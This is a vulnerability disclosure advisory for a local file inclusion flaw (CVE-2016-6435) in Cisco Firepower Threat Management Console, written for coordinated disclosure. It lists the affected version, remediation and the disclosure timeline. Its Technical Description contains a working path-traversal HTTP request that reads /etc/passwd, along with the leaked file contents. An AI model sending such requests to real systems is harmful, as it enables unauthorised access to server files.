Cisco Firepower Threat Management Console Local File Inclusion

Vulnerability Details

Affected Vendor: Cisco
Affected Product: Firepower Threat Management Console
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
Platform: Embedded Linux
CWE Classification: CWE-73: External Control of File Name or Path
Impact: Information Disclosure
Attack vector: HTTP
CVE-ID: CVE-2016-6435

Vulnerability Description

An authenticated user can access arbitrary files on the local system.

Technical Description

Requests that take a file path do not properly filter what files can
be requested. The webserver does not run as root, so files such as
/etc/shadow are not readable.

GET /events/reports/view.cgi?download=1&files=…/…/…/etc/passwd%00 HTTP/1.1
Host: 1.3.3.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3
Connection: close

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2016 23:58:41 GMT
Server: Apache
Content-Disposition: attachment; filename=passwd
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/octet-stream
Content-Length: 623

root:x:0:0:Operator:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin
nobody:x:99:99:nobody:/:/sbin/nologin
sshd:x:33:33:sshd:/:/sbin/nologin
www:x:67:67:HTTP server:/var/www:/sbin/nologin
sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin
snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin
sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin
sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin
admin:x:100:100::/Volume/home/admin:/bin/sh
casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash

Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability
in version 6.1. Vendor acknowledgement available at:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

Disclosure Timeline

2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
2016.06.30 - Cisco acknowledges receipt of vulnerability report.
2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
this vulnerability and for 3 others reported in the
same product.
2016.08.12 - 30 business days have elapsed since the vulnerability was
reported to Cisco.
2016.09.02 - 45 business days have elapsed since the vulnerability was
reported to Cisco.
2016.09.09 - KoreLogic asks for an update on the status of the
remediation efforts.
2016.09.15 - Cisco confirms remediation is underway and soon to be
completed.
2016.09.28 - Cisco informs KoreLogic that the remediation details will
be released publicly on 2016.10.05.
2016.10.05 - Public disclosure.

Proof of Concept

See Technical Description